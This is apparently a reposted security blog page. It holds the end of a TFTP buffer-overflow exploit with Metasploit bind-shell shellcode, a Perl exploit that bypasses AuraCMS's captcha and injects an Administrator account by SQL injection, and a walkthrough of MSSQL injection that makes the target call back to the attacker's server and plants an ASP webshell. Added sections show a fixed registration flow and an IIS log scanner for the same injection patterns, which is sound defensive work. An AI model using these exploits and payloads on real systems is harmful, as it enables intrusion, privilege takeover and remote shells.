   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

# Jump back shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")

filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"
mode = "netascii"
muha = "\x00\x02" + filename+ "\0" + mode+ "\0"

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

# milw0rm.com [2008-03-26]

AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit

Posted in 搬家之前 (Before the move) on March 30th, 2008 by 飘 (piao2010)
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit
# Date      :  Feb 28 2008 08:00PM
# Software  :  AuraCMS
# Version   :  2.0
#              2.1
#              2.2.1
# Vendor    :  http://www.auracms.org/
#
# ------------------------------------
# Audited by  :  NTOS-Team
# Location    :  Indonesia | http://newhack.org
# Description :
#
# Bug in the file "user.php" in the "/content" directory
#---//---
# 59. if (!$nama || preg_match("/[^a-zA-Z0-9_-]/", $nama)) $error .= "Karakter Username tidak diizinkan kecuali a-z,A-Z,0-9,-, dan _<br />";
# 60. if (strlen($nama) > 10) $error .= "Username Terlalu Panjang Maksimal 10 Karakter<br />";
# 61. if (strrpos($nama, " ") > 0) $error .= "Username Tidak Boleh Menggunakan Spasi";
# 62. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 63. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM temp_useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 64. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 65. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM temp_useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 66. if (!nama)  $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 67. if ($cekperaturan != "1") $error .= "You should be agree with rules and conditions of use!<br />";
# 68. if (!nama)  $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 69. if (!password)  $error .= "Error: Formulir Password belum diisi , silahkan ulangi.<br />";
# 70. if ($password != $rpassword)  $error .= "Password and Retype Password Not Macth.<br />";
# 71. if (!country)  $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# 72. checkemail($email);
# 73. $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);
# 74. if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";
# 75.
# 76.
# 77. if ($error){
# 78.        $tengah .='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';
# 79. }else{
# 80.        $hasil1 = $koneksi_db->sql_query("INSERT INTO useraura (user, email, password , level, tipe, negara)VALUES('$nama', '$email', '$password','User','aktif', '$country')" );
# ---//---
# => Security Code Bypass
# Lines 73 - 74 are the interesting code; let's take these 2 lines apart slowly:
# $sitekey is already defined in the file "config.php" in the "includes" directory
# $_POST['random_num'] is a random value sent through the user registration form as a hidden field [not something the user types in]
# $_POST['gfx_check'] is the Security Code value the USER submits through the registration form
# The full write-up can be read at http://ezine.echo.or.id/ezine18/e18.005.txt
#
# => Add Administrator [INSERT method]
# Good... we can now bypass the security code, so let's create a new admin on the target site :p
# Line 71: if the "country" variable is empty the result is $error, but sadly that is the only rule :(
# Look at line 80: VALUES('$nama', '$email', '$password','User','aktif', '$country'), again there is no filtering here
# What are you thinking... mmm... interesting... naughty... evil... but BEAUTIFUL, isn't it... ;)
# Yes... what if we think like this:
#
# VALUES('$nama', '$email', '$password','User','aktif', 'Indonesia['),('Attacker', 'attacker@hack.ed', 'MD5_Pass', 'Administrator', 'aktif', 'Undergr0und]')" );
#
# Now THIS is what you call p0rn0c0d3...,
# One registration session creates 2 users: the first is the user matching the form input, the second is an Administrator user born of the user's NAUGHTINESS :D
# Thanks to the author of http://www.milw0rm.com/papers/149
#
# => Simple Fix
# 1. Security Code
#    Replace it with a session-based captcha, and pick one that OCR cannot read easily
# 2. Add Administrator
#    Replace line 71 in the file "user.php" with:
# ---//---
# 71. if (!$country || preg_match("/[^a-zA-Z]/", $country))   $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# ---//---
#
# => Warning!
# "This exploit was made for learning, testing and proving what we have studied"
# Any misuse of, and damage caused by, this exploit is not our responsibility
#
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
#

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
use Getopt::Long;
no warnings;

# usage banner when site and path are missing
if(!$ARGV[1]) {
 print "\n  |--------------------------------------------------|";
 print "\n  |          Indonesian Newhack Technology           |";
 print "\n  |--------------------------------------------------|";
 print "\n  |   AuraCMS <= 2.2.1  (user.php)                   |";
 print "\n  |   1.Security Code Bypass                         |";
 print "\n  |   2.Add Administrator                            |";
 print "\n  |                Coded by NTOS-Team                |";
 print "\n  |--------------------------------------------------|";
 print "\n  | exploit berhasil jika magic_quotes_gpc = off";
 print "\n[!] Penggunaan : ";
 print "\n[>] perl auracms-user.pl [Site] [Path] ";
 print "\n ";
 print "\n[!] Contoh     : ";
 print "\n[>] perl auracms-user.pl localhost /auracms2x/";
 print "\n ";
 print "\n";
 exit;
}

$host  = $ARGV[0];
$path  = $ARGV[1];
# country value that closes the VALUES tuple of line 80 and opens a second one
$injek = "Indonesia'),('t4mugel4p', 'gelap\@banget.gitu', '213aa1379cce2862538be1c046319684','Administrator','aktif', 'DuniaGelap";
@namabulan = qw(January February March April May June July August September October November December);
$sitekey = "x1a1MhphAur4kea7V3Rs820dweOwxIw4n3UgSusyM4nt04"; # default sitekey from config.php
$tgl   = (localtime)[3];
$bln   = (localtime)[4];
$bulan = $namabulan[$bln];
$date  = "$bulan $tgl";   # same layout as PHP's date("F j") on line 73

## Breaking Security Code Auracms 2.x
$browser = LWP::UserAgent->new() or die();
$getgfx  = $browser->get("http://".$host.$path."?pilih=user&aksi=register",);
$get     = $getgfx->content;
# random_num is readable in the registration page's hidden field
if ($get =~ /random_num" value="(.*?)"><\/td>/) {
  $randnum = $1;
}
# recompute the security code exactly as line 73 does
$gfx = substr(hex(md5_hex($date.$randnum.$sitekey)), 2, 6);

## Add Administrator process
$browser = LWP::UserAgent->new() or die();
$postingkomen = $browser->post("http://".$host.$path."?pilih=user&aksi=register", [
   "nama"=>"t1pu4n",
   "email"=>"k3tipu\@nie.yea",
   "password"=>"terimakasih",
   "rpassword"=>"terimakasih",
   "country"=>$injek,
   "gfx_check"=>$gfx,
   "random_num"=>$randnum,
   "cekperaturan"=>"1",
   "submit"=>"Submit",
 ],);
$komen = $postingkomen->content;
if ($komen =~ />Please Login With Your Username and Your Password</) {
 print "[+]Sukses Register User\n";
 print "[+]Silahkan dicoba login\n";
 print "[+]Username : t4mugel4p\n";
 print "[+]Password : t4mugel4p\n";
 exit();
}
if ($komen =~ />Error/) {
 print "[!]Terjadi Kesalahan Pada Proses Register\n";
 exit();
}
print $komen;
print "[!]\n Exploit Gagal!!! ;)\n";

# milw0rm.com [2008-03-28]
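The advisory's "Simple Fix" section names the two defects but only patches line 71. As an added defender-side example, written for this page and not part of the advisory or of AuraCMS, the registration flow below is rebuilt in Python with both fixes: the security code lives in the server-side session instead of being derived from a hidden random_num plus a site key, country is whitelisted to letters, and the INSERT is parameterised so that even the advisory's own country payload is stored as a literal string in a single 'User' row. Assumptions: the table columns follow the INSERT quoted on line 80, sqlite3 stands in for the CMS's MySQL connection, and the session is a plain dict.

```python
import hashlib
import hmac
import re
import secrets
import sqlite3

# Stand-in for AuraCMS's useraura table (assumption: column names follow the
# INSERT quoted on line 80 of the advisory; sqlite3 replaces MySQL here).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE useraura (user TEXT, email TEXT, password TEXT, "
        "level TEXT, tipe TEXT, negara TEXT)"
    )
    return conn

# The advisory's country value: closes the VALUES tuple and opens a second one
# carrying level='Administrator'. Used here only as a test input for the fixes.
INJECTED_COUNTRY = (
    "Indonesia'),('Attacker', 'attacker@hack.ed', 'MD5_Pass', "
    "'Administrator', 'aktif', 'Undergr0und"
)

USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,10}$")   # lines 59-61 folded into one rule
COUNTRY_RE = re.compile(r"^[A-Za-z]{1,64}$")         # the advisory's line-71 whitelist plus a length cap


def validate_registration(form):
    """Return the list of validation errors; an empty list means the form is acceptable."""
    errors = []
    if not USERNAME_RE.match(form.get("nama", "")):
        errors.append("username must be 1-10 characters from a-z, A-Z, 0-9, '-' or '_'")
    if not form.get("password"):
        errors.append("password must not be empty")
    elif form.get("password") != form.get("rpassword"):
        errors.append("password and retype password do not match")
    if not COUNTRY_RE.match(form.get("country", "")):
        errors.append("country must consist of letters only")
    if form.get("cekperaturan") != "1":
        errors.append("rules and conditions must be accepted")
    return errors


def issue_captcha(session):
    """Session-bound security code: the answer is kept server-side and is never
    derived from anything the client can read back (no hidden random_num)."""
    session["captcha"] = secrets.token_hex(3)   # six hex characters, like the original gfx_check
    return session["captcha"]


def check_captcha(session, submitted):
    """Single-use, constant-time comparison against the session copy."""
    expected = session.pop("captcha", None)
    return expected is not None and hmac.compare_digest(expected, submitted or "")


def insert_user(conn, form):
    """Parameterised INSERT: values travel separately from the SQL text, so a quote
    inside country is stored as data and cannot terminate the VALUES tuple."""
    # sha256 keeps the example dependency-free; a real deployment should use a
    # slow, salted password hash (bcrypt/argon2) instead.
    pw_hash = hashlib.sha256(form["password"].encode()).hexdigest()
    conn.execute(
        "INSERT INTO useraura (user, email, password, level, tipe, negara) "
        "VALUES (?, ?, ?, 'User', 'aktif', ?)",
        (form["nama"], form["email"], pw_hash, form["country"]),
    )
    conn.commit()


def register(conn, session, form):
    """Complete flow: captcha, validation, parameterised insert. Returns (ok, errors)."""
    if not check_captcha(session, form.get("gfx_check")):
        return False, ["security code invalid"]
    errors = validate_registration(form)
    if errors:
        return False, errors
    insert_user(conn, form)
    return True, []


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM useraura").fetchone()[0]


def admin_count(conn):
    return conn.execute(
        "SELECT COUNT(*) FROM useraura WHERE level = 'Administrator'"
    ).fetchone()[0]


if __name__ == "__main__":
    conn, session = make_db(), {}
    form = {"nama": "t1pu4n", "email": "k3tipu@example.invalid", "password": "terimakasih",
            "rpassword": "terimakasih", "country": INJECTED_COUNTRY, "cekperaturan": "1"}
    form["gfx_check"] = issue_captcha(session)
    print(register(conn, session, form))        # (False, ['country must consist of letters only'])
    insert_user(conn, form)                     # validation skipped on purpose: still one 'User' row
    print(row_count(conn), admin_count(conn))   # 1 0
```

The last two lines of the main block make the point the advisory's fix alone misses: whitelisting country is useful defence in depth, but the parameterised INSERT is what removes the injection, because the payload can no longer change the shape of the statement regardless of which form fields are validated.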

An intrusion example with db_owner privileges where the database and the web server are on separate hosts

Posted in 搬家之前 on September 1st, 2007 by 飘(piao2010)

This article was taken from the internet; the author is unknown.

Injection is everywhere now! There are piles of tools, and the days of manual injection are gone; in their place are NBSI, HDSI, the 啊D injection tool and so on, which are also the favourites of the script-kiddie crowd. Even someone who can do nothing and understands nothing only needs a few mouse clicks, and the passwords of a site with an injection hole fall out. Next they scan for the admin backend, upload a trojan, and it's done, that simple. With SA privileges they directly create an account and open 3389 or upload a webshell; if it's an internal network they map a port; with db_owner privileges they consider a differential backup. But what if the web and the database are not on the same server? It's not necessarily hopeless. Apart from writing DOS commands into the registry Run keys so that the target server executes them on the next boot, which has its own limitation (the user must be granted access to the master database to call the stored procedure, very few administrators do that, so the hope is slim), what do we do in that situation? See Figure 1.

With DB privileges, list the directories to see whether the data sits on the same box as the web. If it does, a differential backup is an option. Unfortunately, after searching around, no web directory was found. See Figure 2.

This is the result of using MSSQL's xp_dirtree stored procedure to read paths and write them into a temporary table. The old NBSI did not have this feature, so newbies could only scan for SA and poke at the backend. Later NBSI added the treelist feature, which lists directories and makes it far easier to inspect the directory structure, installed software and so on. Later still, 臭要饭的 developed Getwebshell, which brought the feature to its full glory: insert the trojan into the database, then back the database up as an ASP file. It works, but if the database is too large, is a webshell of tens of megabytes usable? Xiaolu's differential backup is a decent improvement: it reduces the file size by performing a differential backup. But we are back at the original problem: the data and the web are not on the same box.

Actually, even when the database and the web are not on the same box there is still a chance; it is not that there is no chance at all. When a server is set up, IIS usually gets installed, right? List its C: drive and check whether there is an Inetpub directory; that tells you whether IIS is installed. But what if you don't know its IP? You could ping the web server and scan its /24 for port 1433 to see which host has it open. That method isn't great either: many hosts now run a firewall, so even if 1433 is open you won't find it by scanning. What then? You can use the opendatasource macro to make the target's SQL Server open a connection to your own database. Since it can connect, you obtain the database server's IP address. Let's try it. A few prerequisites need stating first: your machine must have a public IP, and its port 1433 must be reachable from the Internet. Good, conditions met, let's start!

On the site I'm working on now, the data and the web are 100% not on the same box, but the C: drive showed an Inetpub folder, so the database server has IIS installed. But I can't get its IP. What to do? Simple: use the method described above. First create a database on your own machine. Open Query Analyzer and enter

create database hack520 Create TABLE zhu(name nvarchar(256) null);Create TABLE J8(id int NULL,name nvarchar(256) null); and click Execute. Figure 3

This created a database named hack520 and two tables, zhu and J8. zhu has a single field, name; J8 has two field names, id and name. Now the connection can be established~~~~~~~ First look at this SQL statement: insert into opendatasource('sqloledb','server=your IP;uid=SQL user;pwd=SQL password;database=the database you created').dbname.tablename 'statement to execute'. OK, let's begin...

http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

Run it in IE. At that moment the other side connects to the SQL Server on my machine. Don't believe it? Take a look with netstat -an. Figure 4

Haha, it has connected. Now the database server's IP is known, and the database server also has port 80 open. What next?

Back up a webshell onto it. The web directory is known to be C:\Inetpub\wwwroot. OK, let's start.

http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- back up the current database

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])--

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--  insert the 蓝屏 trojan

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- a second, differential backup yields the webshell http://221.216xxx.xx/zhu.asp

Next, just connect with the 蓝屏 trojan client. That part is simple, so I won't say more here. Although I did not get a shell on the web server, at least I did not come away empty-handed: I got a shell on the database server.

The approach above is a good one, and hopefully it helps everyone take the box when they meet a similar situation, but it still has limitations. The key is the reverse SQL connection: if the other side has a firewall or TCP/IP filtering configured, the outlook is much less rosy!
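Every step of the walkthrough above passes through the web server's query string, so the defender's cheapest vantage point is the IIS log. As an added example, written for this page and not part of the original article, the Python below URL-decodes the cs-uri-query field of constructed W3C/IIS-style log lines and flags the signatures of the technique: the OPENDATASOURCE call-back, stacked DECLARE statements, BACKUP DATABASE ... TO DISK, xp_dirtree, long hex literals used to smuggle paths and ASP source, and the trailing `--` comment. It also extracts the `server=` address from any OPENDATASOURCE call, which is the listener the closing paragraph's egress filtering would need to block. The rule names, the log layout and the sample lines (RFC 5737 address, dummy credentials) are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the technique described above, applied to the URL-decoded
# query string. Names are constructed for this example.
RULES = [
    ("mssql-opendatasource", re.compile(r"\bopendatasource\s*\(", re.I)),
    ("mssql-backup-to-disk", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I)),
    ("mssql-xp_dirtree", re.compile(r"\bxp_dirtree\b", re.I)),
    ("mssql-stacked-declare", re.compile(r";\s*declare\s+@", re.I)),
    ("sql-hex-literal", re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)),
    ("sql-comment-terminator", re.compile(r"--\s*$")),
]

# Address the target's SQL Server is told to connect back to: an indicator
# worth extracting for egress blocking and for correlating outbound 1433 flows.
OUTBOUND_SERVER_RE = re.compile(r"server\s*=\s*([^;'\"\s]+)", re.I)

# Constructed sample in W3C/IIS field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-09-01 10:00:01 10.0.0.5 GET /news.asp id=126 200
2007-09-01 10:00:07 10.0.0.5 GET /news.asp id=126'insert%20into%20opendatasource('sqloledb','server=203.0.113.10;uid=sa;pwd=pw;database=h').h.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 500
2007-09-01 10:00:15 10.0.0.5 GET /news.asp id=126;declare%20@a%20sysname,@s%20varchar(4000)%20select%20@a=db_name(),@s=0x433A5C74657374%20backup%20database%20@a%20to%20disk=@s-- 200
2007-09-01 10:00:20 10.0.0.9 GET /news.asp id=127&page=2 200
2007-09-01 10:00:31 10.0.0.5 GET /news.asp id=126;exec%20master..xp_dirtree%20'c:%5C'-- 500
"""


def parse_line(line):
    """Split one log line into its seven fields; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": unquote_plus(query), "status": int(status)}


def scan_query(query):
    """Names of every rule the decoded query string trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text):
    """Return one hit record per suspicious line: source IP, URI, rules, call-back server."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        rec = parse_line(raw)
        if rec is None:
            continue
        rules = scan_query(rec["query"])
        if not rules:
            continue
        m = OUTBOUND_SERVER_RE.search(rec["query"])
        hits.append({"line": lineno, "ip": rec["ip"], "stem": rec["stem"],
                     "status": rec["status"], "rules": rules,
                     "outbound_server": m.group(1) if m else None})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding before matching matters: the page's own request lines arrive with `%20` in place of spaces, so a rule written against the raw field would miss `backup database` and `to disk`. The hit on the HTTP 500 line with an `outbound_server` value is the one to act on first, since it names the host the database server was instructed to reach.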